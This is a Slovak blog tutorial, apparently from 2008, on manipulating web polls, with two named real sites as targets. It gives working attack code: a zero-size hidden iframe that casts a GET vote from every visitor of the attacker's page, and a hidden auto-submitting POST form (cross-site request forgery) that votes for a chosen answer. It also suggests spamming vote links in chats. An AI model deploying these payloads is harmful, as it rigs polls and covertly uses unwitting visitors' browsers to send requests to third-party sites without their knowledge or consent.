- Ako urobiť z linkov v code živé linky (pre Firefox a Operu)
- Volanie zadarmo cez zlatestranky.sk
- Zoznam freehostingov so subdomenami
- Vytvorenie CS 1.6 servera zdarma
- Free SMS cez internet
- Spider-Man: Web of Shadows
- Európski poslanci chcú chrániť deti pred zneužitím na internete
- Facebook hostuje až desať miliárd fotografií
- V USA majú nový anti-pirátsky zákon
- Apple odhalí nové MacBooky 14. októbra
Manipulácia ankety
Dnes by som vám chcel predstaviť dva základné typy webových ankiet a možnosti ich manipulácie.Dnes by som vám chcel predstaviť dva základné typy webových ankiet a možnosti ich manipulácie.
Takže na začiatok by sme si mali povedať, akým spôsobom sa pridávajú hlasy do ankety. Existujú dva základné spôsoby:
- metódou GET
- metódou POST
- Nejsou žádné podobné články
Väčšina dnešných ankiet je už zabezpečená proti viacnásobnému hlasovaniu pomocou cookie, IP adresy, atď. Existuje viac spôsobov, ako obísť takúto ochranu. Či už rôznymi náročnými metódami, ako IP Spoofing, rôzne skripty, ktoré si sami vytvoríte, alebo jednoducho využijete návštevníkov svojej vlastnej stránky. A práve tento druhý spôsob si dnes ukážeme.
1. GET
Zoberme si napr. anketu na stránke http://cibulka.net. Základný odosielací formulár vyzerá približne takto (môžete ho vidieť v zdrojovom kóde):
<a href="ankety.php?akce=hlasuj&hlas=5&cil=index&anketa=2">
<a href="ankety.php?akce=hlasuj&hlas=6&cil=index&anketa=2">
<a href="ankety.php?akce=hlasuj&hlas=7&cil=index&anketa=2">
<a href="ankety.php?akce=hlasuj&hlas=11&cil=index&anketa=2">
<a href="ankety.php?akce=hlasuj&hlas=12&cil=index&anketa=2">
Vidíme, že jednotlivé voľby sú odosielané priamo cez url požiadavku: ...?akce=hlasuj&hlas=5&cil=index&anketa=2. Teda ak vyberieme link http://www.cibulka.net/petr/ankety.php?akce=hlasuj&hlas=5&cil=index&anketa=2 a pôjdeme naň, zahlasujeme v ankete. Tento link môžeme rozosielať priateľom, spamovať na pokeci alebo podobne. ALEBO, predpokladajme, že máme vlastnú webstránku, prípadne stránku, ktorej zdrojový kód môžeme pozmeniť. Vložíme teda odkaz na zahlasovanie v ankete pomocou iframe:
<iframe src="http://www.cibulka.net/petr/ankety.php?akce=hlasuj&hlas=5&cil=index&anketa=2" frameborder=0 width=0px height=0px></iframe>
Toto spôsobí, že každý návštevník vašej stránky zahlasuje v ankete.
2. POST
Metóda POST využíva na zasielanie hlasov HTTP hlavičky. Preto nestačí len jednoduchý odkaz. Zoberieme si napríklad anketu na http:///www.centrumbyvania.sk. Ako vidíme, žiadny link na kliknutie, len voliteľné "radio". Pozrieme si teda zdrojový kód:
<form name="adminAnswer" action="http://www.centrumbyvania.sk/cbapp/cms-action/90?__mvcevent=activeQuestionnaire&__action_method=vote" method="post" class="question">
<input type="hidden" name="questionnareId" value="5566">
<input type="radio" name="answerId" value="5567">
<input type="radio" name="answerId" value="5568">
<input type="submit" class="button" name="answerFM.vote" value="Hlasovať"/>
</form>
Z tohto vyplýva, že odpoveď je zasielaná ako POST. Znova využijeme svoje stránky, do ktorých vložíme nasledovný kód:
<iframe frameborder=0 width=0px height=0px src="anketa.php"></iframe>
Ďalej vytvoríme súbor anketa.php, ktorý bude do stránky vložený tak, že to nebude vidieť (frameborder=0 width=0px height=0px). Tento súbor bude obsahovať:
<form name="adminAnswer" action="http://www.centrumbyvania.sk/cbapp/cms-action/90?__mvcevent=activeQuestionnaire&__action_method=vote" method="post" class="question">
<input type="hidden" name="questionnareId" value="5566">
<input type="radio" name="answerId" value="5567" checked>
</form>
<script type="text/javascript">document.forms.adminAnswer.submit();</script>
Vložené "inputy" spôsobia, že zahlasujú za hodnotu 5567. A javascript nakonci automaticky odošle formulár.
To je na dnes všetko, ak by boli nejasnosti, píšte do komentárov :).
Proxy |
19. červenece 08, 13:07